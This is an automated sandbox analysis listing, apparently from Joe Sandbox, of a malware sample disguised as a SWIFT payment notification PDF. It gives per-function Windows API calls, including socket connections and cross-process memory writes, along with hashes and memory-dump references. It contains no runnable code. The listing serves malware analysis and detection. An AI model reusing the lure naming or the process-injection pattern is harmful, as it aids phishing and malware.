                                                                                                                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                              APIs
                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(03311BA8,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(03311BA8,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 142311417-0
                                                                                                                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 245547762-0
                                                                                                                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                              • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2338827641-0
                                                                                                                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2875609808-0
                                                                                                                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                              APIs
                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0041F613
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0041F61F
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041F627
                                                                                                                              • GetTickCount.KERNEL32 ref: 0041F62F
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0041F63B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1445889803-0
                                                                                                                              • Opcode ID: 1135723e8045fd594a3b533cc5e145dd408aa02f7e9604b94c9c62fb4b922c37
                                                                                                                              • Instruction ID: c7bf038de7359fae01b92e37b7086805794b770b917a01077a49d05dcccb2548
                                                                                                                              • Opcode Fuzzy Hash: 1135723e8045fd594a3b533cc5e145dd408aa02f7e9604b94c9c62fb4b922c37
                                                                                                                              • Instruction Fuzzy Hash: 7B11E572D002249FCB208BF8DD4869EB7F4EF18351F510A76D905E7220DA749D468788
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                              • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3741023627-0
                                                                                                                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4023252218-0
                                                                                                                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1489400265-0
                                                                                                                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                              • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1042038666-0
                                                                                                                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2625713937-0
                                                                                                                              • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                              • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                              • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                              • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                              • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 948891078-24824748
                                                                                                                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                              APIs
                                                                                                                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$Default
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1306138088-4108050209
                                                                                                                              • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                                                                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                              • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                                                                                                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
